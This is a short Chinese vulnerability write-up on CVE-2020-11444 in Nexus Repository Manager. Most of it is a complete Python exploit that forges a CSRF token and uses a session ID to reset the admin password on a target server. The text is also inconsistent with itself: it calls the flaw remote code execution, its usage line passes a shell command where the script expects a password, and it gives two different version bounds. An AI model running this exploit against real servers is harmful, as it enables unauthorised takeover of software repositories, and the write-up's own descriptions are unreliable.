(CVE-2020-11444)Nexus Repository Manager 远程代码执行漏洞
一、漏洞简介
该漏洞源于不正确的访问控制。攻击者可借助特制的请求利用该漏洞绕过访问限制。
二、漏洞影响
Nexus Repository Manager 3.x版本至3.21.2版本
三、复现过程
cve-2020-11444_exp.py
python3 cve-2020-11444_exp.py http://www.0-sec.org:8081 "sessionID" "touch /tmp/233"
#!/usr/bin/python3
# -*- coding:utf-8 -*-
# author:zhzyker
# from:https://github.com/zhzyker/exphub
import sys
import requests
if len(sys.argv)!=4:
print('+-----------------------------------------------------------------------------------------------+')
print('+ DES: by zhzyker as https://github.com/zhzyker/exphub +')
print('+ CVE-2020-11444 Nexus 3 Unauthorized Vuln (change admin password +')
print('+-----------------------------------------------------------------------------------------------+')
print('+ USE: python3 <filename> <url> <session> <password> +')
print('+ EXP: python3 cve-2020-11444_exp.py http://ip:8081 6c012a5e-88d9-4f96-a05f-3790294dc49a 123456 +')
print('+ VER: Nexus Repository Manager 3.x OSS / Pro <= 3.21.1 +')
print('+-----------------------------------------------------------------------------------------------+')
sys.exit(0)
url = sys.argv[1]
vuln_url = url + "/service/rest/beta/security/users/admin/change-password"
session = sys.argv[2]
password = sys.argv[3]
headers = {
'accept': "application/json",
'User-Agent': "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36",
'NX-ANTI-CSRF-TOKEN': "0.6080434247960143",
'Content-Type': "text/plain",
'Origin': "http://127.0.0.1:8081",
'Cookie': "NX-ANTI-CSRF-TOKEN=0.6080434247960143; NXSESSIONID="+session+""
}
data = """%s""" % password
r = requests.request('PUT', url=vuln_url, headers=headers, data=data)
if r.status_code == 204:
print ("[+] Passowrd Change Success")
print ("[+] " + url)
print ("[+] Username:admin Passowrd:"+password+"")
else:
print ("[-] SessionID Not available")
print ("[-] Target Not CVE-2020-11444 Vuln Good Luck")
sys.exit(0)
参考链接
https://github.com/zhzyker/exphub/blob/master/nexus/cve-2020-11444_exp.py